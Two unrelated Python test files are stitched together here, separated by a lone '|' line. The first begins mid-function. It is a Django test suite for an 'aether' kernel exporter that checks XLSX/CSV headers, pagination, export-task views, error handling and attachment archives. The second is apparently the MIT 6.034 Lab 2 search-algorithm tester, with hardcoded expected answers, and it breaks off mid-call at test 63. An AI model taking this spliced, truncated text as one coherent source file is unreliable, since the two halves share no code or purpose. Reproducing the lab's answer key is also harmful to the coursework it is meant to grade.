self.assertEqual(ws['K2'].value, 'How many?')
self.assertEqual(ws['L2'].value, 'Percentage')
self.assertEqual(ws['M2'].value, 'When?')
self.assertEqual(ws['N2'].value, 'At?')
self.assertEqual(ws['O2'].value, 'Choice (A/B)')
self.assertEqual(ws['P2'].value, 'Option A — Choice A')
self.assertEqual(ws['Q2'].value, 'ID')
# check rows
self.assertEqual(ws['A3'].value, 1)
self.assertEqual(ws['B3'].value, _id)
self.assertEqual(ws['C3'].value, 'CM')
self.assertEqual(ws['D3'].value, None)
self.assertEqual(ws['E3'].value, 'Name')
self.assertEqual(ws['F3'].value, 52.52469543)
self.assertEqual(ws['G3'].value, 13.39282687)
self.assertEqual(ws['H3'].value, 108)
self.assertEqual(ws['I3'].value, 22)
self.assertEqual(ws['J3'].value, None)
self.assertEqual(ws['K3'].value, 3)
self.assertEqual(ws['L3'].value, 3.56)
self.assertEqual(ws['M3'].value, '2017-07-14T00:00:00')
self.assertEqual(ws['N3'].value, '2017-07-14T16:38:47.151000+02:00')
self.assertEqual(ws['O3'].value, 'a')
self.assertEqual(ws['P3'].value, 'A')
self.assertEqual(ws['Q3'].value, '6b90cfb6-0ee6-4035-94bc-fb7f3e56d790')
ws1 = wb['1'] # first array content
# check headers: paths
self.assertEqual(ws1['A1'].value, '@')
self.assertEqual(ws1['B1'].value, '@id')
self.assertEqual(ws1['C1'].value, 'lang—#')
self.assertEqual(ws1['D1'].value, 'lang—#—')
# check headers: labels
self.assertEqual(ws1['A2'].value, '@')
self.assertEqual(ws1['B2'].value, '@id')
self.assertEqual(ws1['C2'].value, 'Spoken languages — #')
self.assertEqual(ws1['D2'].value, 'Spoken languages — # — ')
# check rows
self.assertEqual(ws1['A3'].value, 1)
self.assertEqual(ws1['B3'].value, _id)
self.assertEqual(ws1['C3'].value, 1)
self.assertEqual(ws1['D3'].value, 'EN')
self.assertEqual(ws1['A4'].value, 1)
self.assertEqual(ws1['B4'].value, _id)
self.assertEqual(ws1['C4'].value, 2)
self.assertEqual(ws1['D4'].value, 'FR')
ws2 = wb['2'] # second array content
# check headers: paths
self.assertEqual(ws2['A1'].value, '@')
self.assertEqual(ws2['B1'].value, '@id')
self.assertEqual(ws2['C1'].value, 'iterate—#')
self.assertEqual(ws2['D1'].value, 'iterate—#—index')
self.assertEqual(ws2['E1'].value, 'iterate—#—value')
# check headers: labels
self.assertEqual(ws2['A2'].value, '@')
self.assertEqual(ws2['B2'].value, '@id')
self.assertEqual(ws2['C2'].value, 'Indicate loop elements — #')
self.assertEqual(ws2['D2'].value, 'Indicate loop elements — # — Index')
self.assertEqual(ws2['E2'].value, 'Indicate loop elements — # — Value')
# check rows
self.assertEqual(ws2['A3'].value, 1)
self.assertEqual(ws2['B3'].value, _id)
self.assertEqual(ws2['C3'].value, 1)
self.assertEqual(ws2['D3'].value, 1)
self.assertEqual(ws2['E3'].value, 'One')
self.assertEqual(ws2['A4'].value, 1)
self.assertEqual(ws2['B4'].value, _id)
self.assertEqual(ws2['C4'].value, 2)
self.assertEqual(ws2['D4'].value, 2)
self.assertEqual(ws2['E4'].value, 'Two')
self.assertEqual(ws2['A5'].value, 1)
self.assertEqual(ws2['B5'].value, _id)
self.assertEqual(ws2['C5'].value, 3)
self.assertEqual(ws2['D5'].value, 3)
self.assertEqual(ws2['E5'].value, 'Three')
ws3 = wb['3'] # third array content
# check headers: paths
self.assertEqual(ws3['A1'].value, '@')
self.assertEqual(ws3['B1'].value, '@id')
self.assertEqual(ws3['C1'].value, 'iterate_one—#')
self.assertEqual(ws3['D1'].value, 'iterate_one—#—item')
# check headers: labels
self.assertEqual(ws3['A2'].value, '@')
self.assertEqual(ws3['B2'].value, '@id')
self.assertEqual(ws3['C2'].value, 'Indicate one — #')
self.assertEqual(ws3['D2'].value, 'Indicate one — # — Item')
# check rows
self.assertEqual(ws3['A3'].value, 1)
self.assertEqual(ws3['B3'].value, _id)
self.assertEqual(ws3['C3'].value, 1)
self.assertEqual(ws3['D3'].value, 'one')
def test__generate__xlsx__flatten(self):
_id = str(models.Submission.objects.first().pk)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=1,
options={
'header_content': 'paths',
'header_separator': '—',
'header_shorten': 'no',
'data_format': 'flatten',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
self.assertEqual(ws['C1'].value, 'country')
self.assertEqual(ws['D1'].value, 'region')
self.assertEqual(ws['E1'].value, 'name')
self.assertEqual(ws['F1'].value, 'location—latitude')
self.assertEqual(ws['G1'].value, 'location—longitude')
self.assertEqual(ws['H1'].value, 'location—altitude')
self.assertEqual(ws['I1'].value, 'location—accuracy')
self.assertEqual(ws['J1'].value, 'image')
self.assertEqual(ws['K1'].value, 'number')
self.assertEqual(ws['L1'].value, 'number2')
self.assertEqual(ws['M1'].value, 'date')
self.assertEqual(ws['N1'].value, 'datetime')
self.assertEqual(ws['O1'].value, 'option')
self.assertEqual(ws['P1'].value, 'option_a—choice_a')
self.assertEqual(ws['Q1'].value, 'lang—1')
self.assertEqual(ws['R1'].value, 'lang—2')
self.assertEqual(ws['S1'].value, 'iterate—1—index')
self.assertEqual(ws['T1'].value, 'iterate—1—value')
self.assertEqual(ws['U1'].value, 'iterate—2—index')
self.assertEqual(ws['V1'].value, 'iterate—2—value')
self.assertEqual(ws['W1'].value, 'iterate—3—index')
self.assertEqual(ws['X1'].value, 'iterate—3—value')
self.assertEqual(ws['Y1'].value, 'iterate_one—1—item')
self.assertEqual(ws['Z1'].value, 'id')
# check rows
self.assertEqual(ws['A2'].value, 1)
self.assertEqual(ws['B2'].value, _id)
self.assertEqual(ws['C2'].value, 'CM')
self.assertEqual(ws['D2'].value, None)
self.assertEqual(ws['E2'].value, 'Name')
self.assertEqual(ws['F2'].value, 52.52469543)
self.assertEqual(ws['G2'].value, 13.39282687)
self.assertEqual(ws['H2'].value, 108)
self.assertEqual(ws['I2'].value, 22)
self.assertEqual(ws['J2'].value, None)
self.assertEqual(ws['K2'].value, 3)
self.assertEqual(ws['L2'].value, 3.56)
self.assertEqual(ws['M2'].value, '2017-07-14T00:00:00')
self.assertEqual(ws['N2'].value, '2017-07-14T16:38:47.151000+02:00')
self.assertEqual(ws['O2'].value, 'a')
self.assertEqual(ws['P2'].value, 'A')
self.assertEqual(ws['Q2'].value, 'EN')
self.assertEqual(ws['R2'].value, 'FR')
self.assertEqual(ws['S2'].value, 1)
self.assertEqual(ws['T2'].value, 'One')
self.assertEqual(ws['U2'].value, 2)
self.assertEqual(ws['V2'].value, 'Two')
self.assertEqual(ws['W2'].value, 3)
self.assertEqual(ws['X2'].value, 'Three')
self.assertEqual(ws['Y2'].value, 'one')
self.assertEqual(ws['Z2'].value, '6b90cfb6-0ee6-4035-94bc-fb7f3e56d790')
@mock.patch('aether.kernel.api.exporter.RECORDS_PAGE_SIZE', 1)
def test__generate__xlsx__paginate(self):
submission_1 = models.Submission.objects.first()
submission_2 = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=submission_1.mappingset,
)
submission_3 = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=submission_1.mappingset,
)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=2,
options={
'header_content': 'paths',
'header_separator': '*',
'header_shorten': '—',
'data_format': 'flatten',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
# check entries (ordered by `modified` DESC)
self.assertEqual(ws['A2'].value, 1)
self.assertEqual(ws['B2'].value, str(submission_3.pk))
self.assertEqual(ws['A3'].value, 2)
self.assertEqual(ws['B3'].value, str(submission_2.pk))
self.assertIsNone(ws['A4'].value) # limit is 2
# -----------------------------
# VIEWS
# -----------------------------
def test__exporttask_view(self):
task = models.ExportTask.objects.create(
name='test',
project=models.Project.objects.first(),
)
task_file = models.ExportTaskFile.objects.create(
task=task,
file=SimpleUploadedFile('a.txt', b'123')
)
task_url = reverse('exporttask-detail', kwargs={'pk': task.pk})
response = self.client.get(task_url)
self.assertEqual(response.status_code, 200)
data = response.json()
self.assertEqual(data['name'], 'test')
self.assertEqual(len(data['files']), 1)
self.assertEqual(data['files'][0]['md5sum'], task_file.md5sum)
self.assertEqual(
data['files'][0]['file_url'],
f'http://testserver/export-tasks/{task.pk}/file-content/{task_file.pk}/')
task_file_content = self.client.get(data['files'][0]['file_url'])
self.assertEqual(task_file_content.getvalue(), b'123')
task.delete()
response = self.client.get(task_url)
self.assertEqual(response.status_code, 404)
def test__view(self):
response = self.client.post(reverse('submission-csv'))
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'DONE')
self.assertIsNone(task.error_records)
self.assertIsNone(task.status_attachments)
def test__empty(self):
url = reverse('submission-xlsx')
response = self.client.get(f'{url}?start_at=1')
self.assertEqual(response.status_code, 200)
response = self.client.get(f'{url}?start_at=2')
self.assertEqual(response.status_code, 204)
response = self.client.get(f'{url}?page=1')
self.assertEqual(response.status_code, 200)
response = self.client.get(f'{url}?page=2')
self.assertEqual(response.status_code, 204)
response = self.client.post(f'{url}?project=unknown')
self.assertEqual(response.status_code, 204)
def test__more_than_one_project(self):
# create at least 2 more projects
for i in range(2):
self.helper__create_project(i + 2)
self.assertEqual(models.Project.objects.count(), 3)
self.assertEqual(models.Submission.objects.count(), 3)
self.assertEqual(models.Entity.objects.count(), 3)
url = reverse('submission-xlsx')
response = self.client.post(url)
self.assertEqual(response.status_code, 400)
response = self.client.post(f'{url}?project=project_1')
self.assertEqual(response.status_code, 200)
response = self.client.post(f'{url}?project=project_2')
self.assertEqual(response.status_code, 200)
# -----------------------------
# ERROR HANDLING
# -----------------------------
def test__error__deleted_task(self):
def my_side_effect(task_id):
# let's remove the task and execute the real method
models.ExportTask.objects.filter(pk=task_id).delete()
execute_records_task(task_id)
with mock.patch(
'aether.kernel.api.exporter.execute_records_task',
side_effect=my_side_effect,
):
response = self.client.get(reverse('submission-xlsx'))
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 0)
task_id = response.json()['task']
self.assertFalse(models.ExportTask.objects.filter(pk=task_id).exists())
@mock.patch(
'aether.kernel.api.exporter.__prepare_xlsx',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__xlsx__error(self, *args):
response = self.client.get(reverse('submission-xlsx'))
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'ERROR')
self.assertEqual(task.error_records, '[Errno 2] No such file or directory')
self.assertEqual(task.files.count(), 0)
self.assertEqual(task.settings['offset'], 0)
self.assertEqual(task.settings['limit'], 1)
self.assertEqual(task.settings['records']['file_format'], 'xlsx')
self.assertEqual(task.settings['records']['filename'], 'project_1-export')
self.assertEqual(
task.settings['records']['export_options'],
{
'header_content': 'labels',
'header_separator': '/',
'header_shorten': 'no',
'data_format': 'split',
})
@mock.patch(
'aether.kernel.api.exporter.__generate_csv_files',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__csv__error(self, *args):
for i in range(13):
models.Submission.objects.create(
payload=dict({'name': f'Person-{i}'}),
mappingset=models.MappingSet.objects.first(),
)
response = self.client.post(
reverse('submission-csv'),
data=json.dumps({
'paths': ['_id', '_rev'],
'labels': {'_id': 'id', '_rev': 'rev'},
'filename': 'submissions',
'page': 3,
'page_size': 5,
'header_content': 'labels and paths', # not valid, switch to "labels"
'header_separator': '', # not valid, switch to "/"
'header_shorten': 'maybe yes', # not valid, switch to "no"
'data_format': 'flattening', # not valid, switch to "split"
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.settings['offset'], 10)
self.assertEqual(task.settings['limit'], 14) # there was already one submission
self.assertEqual(task.settings['records']['file_format'], 'csv')
self.assertEqual(task.settings['records']['filename'], 'submissions')
self.assertEqual(task.settings['records']['paths'], ['_id', '_rev'])
self.assertEqual(task.settings['records']['labels'], {'_id': 'id', '_rev': 'rev'})
self.assertEqual(
task.settings['records']['export_options'],
{
'header_content': 'labels',
'header_separator': '/',
'header_shorten': 'no',
'data_format': 'split',
})
@mock.patch(
'aether.kernel.api.exporter.__generate_csv_files',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__csv__error_2(self, *args):
response = self.client.post(
reverse('submission-csv'),
data=json.dumps({
'header_content': 'paths',
'header_separator': ':',
'header_shorten': 'yes',
'data_format': 'flatten',
'csv_separator': 'TAB', # will be replaced with `\t`
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'ERROR')
self.assertEqual(task.files.count(), 0)
settings = task.settings
self.assertEqual(settings['offset'], 0)
self.assertEqual(settings['limit'], 1)
self.assertEqual(settings['records']['file_format'], 'csv')
self.assertEqual(settings['records']['filename'], 'project_1-export')
self.assertEqual(
settings['records']['export_options'],
{
'header_content': 'paths',
'header_separator': ':',
'header_shorten': 'yes',
'data_format': 'flatten',
})
# -----------------------------
# ATTACHMENTS
# -----------------------------
def test__attachments__exclude(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('submission.xml', b'a'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('audit.csv', b'b'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('c.txt', b'c'),
)
self.assertEqual(models.Attachment.objects.count(), 3)
response = self.client.post(
reverse('submission-csv') +
'?generate_attachments=t&exclude_files=(audit\\.csv|\\.xml)$'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.status_attachments, 'DONE', task.error_attachments)
self.assertEqual(task.files.count(), 1)
# check attachments
attachments_file = task.files.first()
with tempfile.NamedTemporaryFile() as fa:
with open(fa.name, 'wb') as fpa:
fpa.write(attachments_file.get_content().getvalue())
_attach_files = zipfile.ZipFile(fa).namelist()
self.assertEqual(len(_attach_files), 2, _attach_files)
self.assertIn(f'{submission.pk}/', _attach_files)
self.assertIn(f'{submission.pk}/c.txt', _attach_files)
def test__attachments__exclude__all(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('submission.xml', b'a'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('audit.csv', b'b'),
)
self.assertEqual(models.Attachment.objects.count(), 2)
response = self.client.post(
reverse('submission-xlsx') +
'?generate_attachments=t&exclude_files=(audit\\.csv$|\\.xml$)'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.status_attachments, 'ERROR', task.error_attachments)
self.assertEqual(task.error_attachments, 'No attachments found!')
self.assertEqual(task.files.count(), 0)
def test__attachments__empty(self):
models.Attachment.objects.all().delete()
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 204)
self.assertEqual(models.ExportTask.objects.count(), 0)
def test__attachments__ok(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('a.txt', b'a123'),
)
entity_1 = submission.entities.first()
# new submission with 2 attachments
submission.pk = None
submission.payload = dict(self.EXAMPLE_PAYLOAD)
submission.save()
self.assertEqual(models.Submission.objects.count(), 2)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('b.txt', b'b123'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('c.txt', b'c123'),
)
self.assertEqual(models.Attachment.objects.count(), 3)
run_extraction(submission)
self.assertEqual(models.Entity.objects.count(), 2)
entity_2 = submission.entities.first()
# new submission without attachments
submission.pk = None
submission.payload = dict(self.EXAMPLE_PAYLOAD)
submission.save()
self.assertEqual(models.Submission.objects.count(), 3)
run_extraction(submission)
self.assertEqual(models.Entity.objects.count(), 3)
response = self.client.post(
reverse('entity-csv') + '?generate_records=t&generate_attachments=t'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'DONE', task.error_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'DONE', task.error_attachments)
self.assertIsNone(task.error_attachments)
self.assertEqual(task.files.count(), 2)
self.assertIsNone(task.revision)
# export file
export_file = task.files.first()
self.assertIn('project_1-export-', export_file.name)
self.assertIsNone(export_file.revision)
with tempfile.NamedTemporaryFile() as fe:
with open(fe.name, 'wb') as fpe:
fpe.write(export_file.get_content().getvalue())
_csv_files = zipfile.ZipFile(fe).namelist()
self.assertEqual(len(_csv_files), 4, _csv_files)
self.assertIn('project_1-export.csv', _csv_files)
self.assertIn('project_1-export.1.csv', _csv_files)
self.assertIn('project_1-export.2.csv', _csv_files)
self.assertIn('project_1-export.3.csv', _csv_files)
# attachments
attachments_file = task.files.last()
self.assertIn('project_1-export-attachments-', attachments_file.name)
self.assertIsNone(attachments_file.revision)
with tempfile.NamedTemporaryFile() as fa:
with open(fa.name, 'wb') as fpa:
fpa.write(attachments_file.get_content().getvalue())
_attach_files = zipfile.ZipFile(fa).namelist()
self.assertEqual(len(_attach_files), 5, _attach_files)
self.assertIn(f'{entity_1.pk}/', _attach_files)
self.assertIn(f'{entity_1.pk}/a.txt', _attach_files)
self.assertIn(f'{entity_2.pk}/', _attach_files)
self.assertIn(f'{entity_2.pk}/b.txt', _attach_files)
self.assertIn(f'{entity_2.pk}/c.txt', _attach_files)
def test__attachments__deleted_task(self):
def my_side_effect(task_id):
# let's remove the task and execute the real method
models.ExportTask.objects.filter(pk=task_id).delete()
execute_attachments_task(task_id)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
with mock.patch(
'aether.kernel.api.exporter.execute_attachments_task',
side_effect=my_side_effect,
):
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 0)
@override_settings(EXPORT_NUM_CHUNKS=1) # creates 3 processes
def test__attachments__error(self, *args):
def my_side_effect(*args, **kwargs):
if not kwargs['url'].endswith('/b.txt'):
safe_sleep() # wait a little bit
return requests.request(*args, **kwargs) # real method
else:
# there is going to be an unexpected error while fetching file "b.txt"
raise RuntimeError('Being evil')
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('b.txt', b'123'),
)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('c.txt', b'123'),
)
with mock.patch('aether.sdk.utils.request',
side_effect=my_side_effect):
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertIsNone(task.status_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'ERROR')
self.assertEqual(task.error_attachments, 'Being evil')
self.assertEqual(task.files.count(), 0)
self.assertIsNone(task.revision)
@mock.patch(
'shutil.make_archive',
side_effect=RuntimeError('Zip too big!!!'),
)
def test__attachments__error__zipping(self, mock_req):
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertIsNone(task.status_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'ERROR')
self.assertEqual(task.error_attachments, 'Zip too big!!!')
self.assertEqual(task.files.count(), 0)
self.assertIsNone(task.revision)
|
# MIT 6.034 Lab 2: Search
from tester import make_test, get_tests
from lab2 import (generic_dfs, generic_bfs, generic_hill_climbing,
generic_best_first, generic_beam, generic_branch_and_bound,
generic_branch_and_bound_with_heuristic,
generic_branch_and_bound_with_extended_set, generic_a_star,
is_admissible, is_consistent, a_star,
TEST_GENERIC_BEAM, TEST_HEURISTICS)
from read_graphs import get_graphs
all_graphs = get_graphs()
GRAPH_0 = all_graphs['GRAPH_0']
GRAPH_1 = all_graphs['GRAPH_1']
GRAPH_2 = all_graphs['GRAPH_2']
GRAPH_3 = all_graphs['GRAPH_3']
GRAPH_FOR_HEURISTICS = all_graphs['GRAPH_FOR_HEURISTICS']
##########################################################################
### OFFLINE TESTS (HARDCODED ANSWERS)
#### PART 1: Helper Functions #########################################
make_test(type = 'FUNCTION', #TEST 1
getargs = [GRAPH_1, ['a', 'c', 'b', 'd']],
testanswer = lambda val, original_val=None: val == 11,
expected_val = 11,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 2
getargs = [GRAPH_2, ['D', 'C', 'A', 'D', 'E', 'G', 'F']],
testanswer = lambda val, original_val=None: val == 53,
expected_val = 53,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 3
getargs = [GRAPH_1, ['a']],
testanswer = lambda val, original_val=None: val == 0,
expected_val = 0,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 4
getargs = [['node1', 'node3', 'node2']],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 5
getargs = [['d', 'a', 'c', 'a', 'b']],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 6
getargs = [list('SBCA')],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 7
getargs = [['X']],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
extensions_test1_answer = [['n2', 'n1'], ['n2', 'n3']]
make_test(type = 'FUNCTION', #TEST 8
getargs = [GRAPH_0, ['n2']],
testanswer = lambda val, original_val=None: val == extensions_test1_answer,
expected_val = extensions_test1_answer,
name = 'extensions')
extensions_test2_answer = [['n2', 'n3', 'n4']]
make_test(type = 'FUNCTION', #TEST 9
getargs = [GRAPH_0, ['n2', 'n3']],
testanswer = lambda val, original_val=None: val == extensions_test2_answer,
expected_val = extensions_test2_answer,
name = 'extensions')
extensions_test3_answer = [['S', 'A', 'C', 'E', 'D'],
['S', 'A', 'C', 'E', 'F'],
['S', 'A', 'C', 'E', 'G']]
make_test(type = 'FUNCTION', #TEST 10
getargs = [GRAPH_2, ['S', 'A', 'C', 'E']],
testanswer = lambda val, original_val=None: val == extensions_test3_answer,
expected_val = extensions_test3_answer,
name = 'extensions')
sortby_test1_answer = ['c', 'a', 'b', 'd']
make_test(type = 'FUNCTION', #TEST 11
getargs = [GRAPH_1, 'c', ['d', 'a', 'b', 'c']],
testanswer = lambda val, original_val=None: val == sortby_test1_answer,
expected_val = sortby_test1_answer,
name = 'sort_by_heuristic')
sortby_test2_answer = ['H', 'D', 'F', 'C', 'C', 'A', 'B']
make_test(type = 'FUNCTION', #TEST 12
getargs = [GRAPH_2, 'G', ['D', 'C', 'B', 'H', 'A', 'F', 'C']],
testanswer = lambda val, original_val=None: val == sortby_test2_answer,
expected_val = sortby_test2_answer,
name = 'sort_by_heuristic')
sortby_test3_answer = ['G', 'X', 'Y', 'F']
make_test(type = 'FUNCTION', #TEST 13
getargs = [GRAPH_2, 'G', ['X', 'Y', 'G', 'F']],
testanswer = lambda val, original_val=None: val == sortby_test3_answer,
expected_val = sortby_test3_answer,
name = 'sort_by_heuristic')
#### PART 2: Generic Search #######################################
search_args = {"dfs": generic_dfs,
"bfs": generic_bfs,
"hill_climbing": generic_hill_climbing,
"best_first": generic_best_first,
"beam": generic_beam,
"branch_and_bound": generic_branch_and_bound,
"branch_and_bound_with_heuristic": generic_branch_and_bound_with_heuristic,
"branch_and_bound_with_extended_set": generic_branch_and_bound_with_extended_set,
"a_star": generic_a_star}
# Tests 14-31
search_tests = [['dfs', GRAPH_1, 'a', 'd', 'abcd'],
['dfs', GRAPH_2, 'S', 'G', 'SACDEFG'],
['bfs', GRAPH_1, 'a', 'd', 'abd'],
['bfs', GRAPH_2, 'S', 'G', 'SACEG'],
# ['hill_climbing', GRAPH_1, 'a', 'd', 'abcd'], #depends on lexicographic tie-breaking
['hill_climbing', GRAPH_2, 'S', 'G', 'SADHFG'],
# ['best_first', GRAPH_1, 'a', 'd', 'abcd'], #depends on lexicographic tie-breaking
['best_first', GRAPH_2, 'S', 'G', 'SADEG'],
# ['beam', GRAPH_1, 'a', 'd', 2, 'abd'], #depends on lexicographic tie-breaking
['beam', GRAPH_2, 'S', 'G', 2, 'SBYCEG'],
['beam', GRAPH_2, 'S', 'G', 1, 'SADHFG'],
['beam', GRAPH_2, 'S', 'G', 3, 'SADEG'],
['branch_and_bound', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound', GRAPH_3, 's', 'g', 'sxwg'],
['branch_and_bound_with_heuristic', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound_with_heuristic', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound_with_heuristic', GRAPH_3, 's', 'g', 'szwg'],
['branch_and_bound_with_extended_set', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound_with_extended_set', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound_with_extended_set', GRAPH_3, 's', 'g', 'sxwg'],
['a_star', GRAPH_1, 'a', 'd', 'acd'],
['a_star', GRAPH_2, 'S', 'G', 'SBCEG'],
['a_star', GRAPH_3, 's', 'g', 'sywg']]
def str_to_list(string):
return [char for char in string]
for arg_list in search_tests:
if arg_list[0] != 'beam':
(lambda method, graph, startNode, endNode, answer_string :
make_test(type = 'NESTED_FUNCTION',
getargs = [search_args[method], [graph, startNode, endNode]],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = 'generic_search')
)(*arg_list[:5])
bb_extended_set_tests = [["generic_branch_and_bound", False],
["generic_branch_and_bound_with_heuristic", False],
["generic_branch_and_bound_with_extended_set", True]]
def get_bb_extended_testanswer_fn(answer):
def bb_extended_testanswer(val, original_val=None):
if val == [None, None, None, None]:
raise NotImplementedError
return val[3] == answer
return bb_extended_testanswer
for arg_list in bb_extended_set_tests: #Tests 32-34
(lambda method, answer :
make_test(type = 'VALUE',
getargs = method,
testanswer = get_bb_extended_testanswer_fn(answer),
expected_val = "Correct boolean value indicating whether search uses extended set",
name = method)
)(*arg_list)
#### PART 3: Search Algorithms #########################################
# no-path-found tests with nonexistent goal node: #Tests 35-38
for search_method in ['dfs', 'bfs', 'branch_and_bound',
'branch_and_bound_with_extended_set']:
(lambda method :
make_test(type = 'FUNCTION',
getargs = [GRAPH_1, 'a', 'z'],
testanswer = (lambda val, original_val=None: val == None),
expected_val = None,
name = method)
)(search_method)
# no-path-found test for beam:
make_test(type = 'FUNCTION', #TEST 39
getargs = [GRAPH_2, 'C', 'G', 1],
testanswer = (lambda val, original_val=None: val == None),
expected_val = None,
name = 'beam')
# Tests 40-60
for arg_list in search_tests:
if arg_list[0] == 'beam':
(lambda method, graph, startNode, endNode, beam_width, answer_string :
make_test(type = 'FUNCTION',
getargs = [graph, startNode, endNode, beam_width],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = method)
)(*arg_list[:6])
else:
(lambda method, graph, startNode, endNode, answer_string :
make_test(type = 'FUNCTION',
getargs = [graph, startNode, endNode],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = method)
)(*arg_list[:5])
#### PART 4: Heuristics ###################################################
make_test(type = 'FUNCTION', #TEST 61
getargs = [GRAPH_1, 'd'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 62
getargs = [GRAPH_1, 'c'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 63
getargs = [GRAPH_2, 'G'],
